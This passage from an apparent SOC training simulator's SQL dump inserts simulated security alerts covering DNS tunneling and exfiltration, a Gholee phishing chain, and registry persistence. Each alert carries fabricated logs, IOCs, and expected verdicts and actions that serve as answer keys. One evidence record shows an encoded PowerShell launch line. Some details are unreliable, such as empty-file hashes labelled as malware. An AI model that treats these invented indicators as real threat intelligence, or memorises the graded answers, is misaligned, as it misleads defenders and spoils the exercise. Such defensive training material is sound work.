2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"103.21.244.15\\\",\\\"dns_query\\\":\\\"subdomain.example.com\\\",\\\"dns_response\\\":\\\"NXDOMAIN\\\",\\\"protocol\\\":\\\"UDP\\\",\\\"port\\\":53,\\\"query_type\\\":\\\"A\\\",\\\"malware_hash\\\":\\\"58e6c2cd47d9b5f8203d8a7c84d8f8c9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"matryoshka_rat.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.110Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"103.21.244.15\\\",\\\"dns_query\\\":\\\"subdomain.example.com\\\",\\\"dns_response\\\":\\\"NXDOMAIN\\\",\\\"protocol\\\":\\\"UDP\\\",\\\"port\\\":53,\\\"query_type\\\":\\\"A\\\",\\\"malware_hash\\\":\\\"58e6c2cd47d9b5f8203d8a7c84d8f8c9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"matryoshka_rat.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.110Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"103.21.244.15\\\",\\\"dns_query\\\":\\\"subdomain.example.com\\\",\\\"dns_response\\\":\\\"NXDOMAIN\\\",\\\"protocol\\\":\\\"UDP\\\",\\\"port\\\":53,\\\"query_type\\\":\\\"A\\\",\\\"malware_hash\\\":\\\"58e6c2cd47d9b5f8203d8a7c84d8f8c9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"matryoshka_rat.dll\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(499, 'Unusual Network Traffic Patterns', 'high', 'Network traffic analysis tools', 'Detected DNS tunneling activity used for lateral movement within the network, originating from an internal host attempting to exfiltrate data from various departments in the Ministry.', 'Lateral Movement', 'T1071.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:08Z\",\"source_ip\":\"10.0.3.25\",\"destination_ip\":\"8.8.8.8\",\"dns_query\":\"sensitive-docs.ministry.local.tunnel.com\",\"method\":\"DNS_TUNNELING\",\"user\":\"jdoe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"detected_by\":\"Network Intrusion Detection System\",\"alert_id\":\"NT-20231015-0004\"}', '2026-01-05 04:03:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.3.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for DNS tunneling.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"8.8.8.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"public\",\"verdict\":\"suspicious\",\"details\":\"Public IP used for external DNS tunneling.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User initiating the DNS tunneling.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with known DNS tunneling tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(500, 'Exfiltration Attempt via Encoded DNS Queries', 'high', 'Intrusion detection systems (IDS)', 'In the final stage, the attackers attempt to exfiltrate reconstructed documents through encoded DNS queries, aiming to send these valuable files back to their servers.', 'Exfiltration', 'T1071.004 - Application Layer Protocol: DNS', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"protocol\":\"DNS\",\"query\":\"dGhpcyBpcyBhIHRlc3QucmVzdWx0LmluZm8uZXhhbXBsZS5jb20=\",\"type\":\"TXT\",\"user\":\"jdoe\",\"hostname\":\"workstation-45.local\",\"file_hash\":\"a5d5c8e2f9b3a4d3e8f5c1a0b2d6e7f9\",\"filename\":\"classified_docs.zip\",\"dns_server\":\"8.8.8.8\",\"dns_response\":\"NoError\"}', '2026-01-05 04:03:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT database\",\"verdict\":\"malicious\",\"details\":\"Known malicious server used for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a5d5c8e2f9b3a4d3e8f5c1a0b2d6e7f9\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data stealing malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"classified_docs.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file containing sensitive documents.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.113Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"DNS\\\",\\\"query\\\":\\\"dGhpcyBpcyBhIHRlc3QucmVzdWx0LmluZm8uZXhhbXBsZS5jb20=\\\",\\\"type\\\":\\\"TXT\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation-45.local\\\",\\\"file_hash\\\":\\\"a5d5c8e2f9b3a4d3e8f5c1a0b2d6e7f9\\\",\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"dns_server\\\":\\\"8.8.8.8\\\",\\\"dns_response\\\":\\\"NoError\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.113Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"DNS\\\",\\\"query\\\":\\\"dGhpcyBpcyBhIHRlc3QucmVzdWx0LmluZm8uZXhhbXBsZS5jb20=\\\",\\\"type\\\":\\\"TXT\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation-45.local\\\",\\\"file_hash\\\":\\\"a5d5c8e2f9b3a4d3e8f5c1a0b2d6e7f9\\\",\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"dns_server\\\":\\\"8.8.8.8\\\",\\\"dns_response\\\":\\\"NoError\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.113Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"DNS\\\",\\\"query\\\":\\\"dGhpcyBpcyBhIHRlc3QucmVzdWx0LmluZm8uZXhhbXBsZS5jb20=\\\",\\\"type\\\":\\\"TXT\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation-45.local\\\",\\\"file_hash\\\":\\\"a5d5c8e2f9b3a4d3e8f5c1a0b2d6e7f9\\\",\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"dns_server\\\":\\\"8.8.8.8\\\",\\\"dns_response\\\":\\\"NoError\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.113Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"DNS\\\",\\\"query\\\":\\\"dGhpcyBpcyBhIHRlc3QucmVzdWx0LmluZm8uZXhhbXBsZS5jb20=\\\",\\\"type\\\":\\\"TXT\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation-45.local\\\",\\\"file_hash\\\":\\\"a5d5c8e2f9b3a4d3e8f5c1a0b2d6e7f9\\\",\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"dns_server\\\":\\\"8.8.8.8\\\",\\\"dns_response\\\":\\\"NoError\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.113Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"DNS\\\",\\\"query\\\":\\\"dGhpcyBpcyBhIHRlc3QucmVzdWx0LmluZm8uZXhhbXBsZS5jb20=\\\",\\\"type\\\":\\\"TXT\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation-45.local\\\",\\\"file_hash\\\":\\\"a5d5c8e2f9b3a4d3e8f5c1a0b2d6e7f9\\\",\\\"filename\\\":\\\"classified_docs.zip\\\",\\\"dns_server\\\":\\\"8.8.8.8\\\",\\\"dns_response\\\":\\\"NoError\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(501, 'Suspicious Connection from Unverified Facebook Profile', 'medium', 'Social Media Monitoring Tools', 'A suspicious connection request from an unverified Facebook profile targeting aerospace employees has been detected. The profile appears to be linked to Rocket Kitten APT, aiming to establish initial contact through social engineering tactics.', 'Social Engineering', 'T1189: Drive-by Compromise', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:23:45Z\",\"platform\":\"Facebook\",\"source_ip\":\"203.0.113.45\",\"target_user\":\"jdoe@aerospacecorp.com\",\"profile_name\":\"Jane Smith\",\"profile_id\":\"fb123456789\",\"profile_url\":\"https://facebook.com/fb123456789\",\"message_content\":\"Hi, I\'m a professional in aerospace technology and would love to connect.\",\"internal_review\":\"Profile created 2 days ago, minimal activity, no verified connections.\",\"connection_status\":\"Pending\",\"internal_ip\":\"192.168.1.105\"}', '2026-01-06 01:24:23', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"jdoe@aerospacecorp.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Email belongs to an aerospace employee.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://facebook.com/fb123456789\",\"is_critical\":true,\"osint_result\":{\"source\":\"Social Media Analysis\",\"verdict\":\"suspicious\",\"details\":\"Recently created profile, minimal activity.\"}}],\"recommended_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.114Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"platform\\\":\\\"Facebook\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"profile_name\\\":\\\"Jane Smith\\\",\\\"profile_id\\\":\\\"fb123456789\\\",\\\"profile_url\\\":\\\"https://facebook.com/fb123456789\\\",\\\"message_content\\\":\\\"Hi, I\'m a professional in aerospace technology and would love to connect.\\\",\\\"internal_review\\\":\\\"Profile created 2 days ago, minimal activity, no verified connections.\\\",\\\"connection_status\\\":\\\"Pending\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.114Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"platform\\\":\\\"Facebook\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"profile_name\\\":\\\"Jane Smith\\\",\\\"profile_id\\\":\\\"fb123456789\\\",\\\"profile_url\\\":\\\"https://facebook.com/fb123456789\\\",\\\"message_content\\\":\\\"Hi, I\'m a professional in aerospace technology and would love to connect.\\\",\\\"internal_review\\\":\\\"Profile created 2 days ago, minimal activity, no verified connections.\\\",\\\"connection_status\\\":\\\"Pending\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.114Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"platform\\\":\\\"Facebook\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"profile_name\\\":\\\"Jane Smith\\\",\\\"profile_id\\\":\\\"fb123456789\\\",\\\"profile_url\\\":\\\"https://facebook.com/fb123456789\\\",\\\"message_content\\\":\\\"Hi, I\'m a professional in aerospace technology and would love to connect.\\\",\\\"internal_review\\\":\\\"Profile created 2 days ago, minimal activity, no verified connections.\\\",\\\"connection_status\\\":\\\"Pending\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.114Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"platform\\\":\\\"Facebook\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"profile_name\\\":\\\"Jane Smith\\\",\\\"profile_id\\\":\\\"fb123456789\\\",\\\"profile_url\\\":\\\"https://facebook.com/fb123456789\\\",\\\"message_content\\\":\\\"Hi, I\'m a professional in aerospace technology and would love to connect.\\\",\\\"internal_review\\\":\\\"Profile created 2 days ago, minimal activity, no verified connections.\\\",\\\"connection_status\\\":\\\"Pending\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.114Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:45Z\\\",\\\"platform\\\":\\\"Facebook\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"target_user\\\":\\\"jdoe@aerospacecorp.com\\\",\\\"profile_name\\\":\\\"Jane Smith\\\",\\\"profile_id\\\":\\\"fb123456789\\\",\\\"profile_url\\\":\\\"https://facebook.com/fb123456789\\\",\\\"message_content\\\":\\\"Hi, I\'m a professional in aerospace technology and would love to connect.\\\",\\\"internal_review\\\":\\\"Profile created 2 days ago, minimal activity, no verified connections.\\\",\\\"connection_status\\\":\\\"Pending\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(502, 'Malicious Direct Message Sent to Employee', 'high', 'Email Security Gateway', 'An attacker, after gaining the trust of an employee, sent a direct message with a malicious attachment disguised as a legitimate document. The attachment is designed to deliver the \'Gholee\' malware payload.', 'Phishing', 'T1566.001: Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"email_id\":\"abc123xyz\",\"sender_email\":\"attacker@maliciousdomain.com\",\"recipient_email\":\"employee@company.com\",\"subject\":\"Industry Report Update\",\"attachment\":\"industry_report_update.docx\",\"attachment_hash\":\"e5d8870e5bdd26602cab8f9d5c8a5f87\",\"malware_name\":\"Gholee\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.25\",\"url\":\"http://maliciousdomain.com/download\",\"indicator_of_compromise\":[\"attacker@maliciousdomain.com\",\"e5d8870e5bdd26602cab8f9d5c8a5f87\",\"203.0.113.45\",\"http://maliciousdomain.com/download\"]}', '2026-01-06 01:24:23', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e5d8870e5bdd26602cab8f9d5c8a5f87\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as \'Gholee\' malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with phishing attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"Malicious download link.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Malicious Direct Message Sent to Employee\",\"date\":\"2026-02-01T20:32:19.116Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(503, 'Execution of \'Gholee\' Malware Detected', 'high', 'Endpoint Detection and Response (EDR)', 'The execution of \'Gholee\' malware was detected on an endpoint following the opening of a malicious email attachment by an unsuspecting employee. This event signifies a potential compromise of the network with the likelihood of attackers establishing an initial foothold.', 'Malware Execution', 'T1204.002: User Execution: Malicious File', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:21:32Z\",\"event_id\":\"EDR-20231015-00123\",\"hostname\":\"workstation-12\",\"user\":\"jdoe\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.5\",\"file_name\":\"invoice_2023.pdf.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_id\":5678,\"parent_process\":\"explorer.exe\",\"action\":\"execute\",\"signature\":\"Gholee Malware\",\"severity\":\"high\"}', '2026-01-06 01:24:23', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash of the executed \'Gholee\' malware file.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice_2023.pdf.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Suspicious filename commonly used in phishing attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account of the employee who executed the malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(504, 'Establishment of Persistence Mechanisms', 'high', 'Log Analysis', 'The \'Gholee\' malware has been observed implementing various persistence techniques to maintain its foothold on the compromised system. Evidence of suspicious modifications to registry keys and the creation of new scheduled tasks were noted, indicating the attacker\'s attempt to remain undetected.', 'Persistence', 'T1547 - Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T03:45:12Z\",\"event_id\":\"4624\",\"source_ip\":\"172.16.254.1\",\"destination_ip\":\"10.0.0.25\",\"username\":\"compromised_user\",\"registry_change\":{\"key_path\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"GholeeUpdater\",\"value_data\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Roaming\\\\Gholee\\\\gholee_updater.exe\"},\"scheduled_task\":{\"name\":\"Gholee Persistence Task\",\"task_file\":\"C:\\\\Windows\\\\System32\\\\Tasks\\\\Gholee\\\\task.xml\",\"creator_user\":\"compromised_user\"},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"external_ip\":\"198.51.100.14\"}', '2026-01-06 01:24:23', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with \'Gholee\' malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.14\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known threat actors.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"gholee_updater.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable file used for malware persistence.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"172.16.254.1\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"GholeeUpdater\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Gholee\\\\\\\\gholee_updater.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"Gholee Persistence Task\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\Gholee\\\\\\\\task.xml\\\",\\\"creator_user\\\":\\\"compromised_user\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 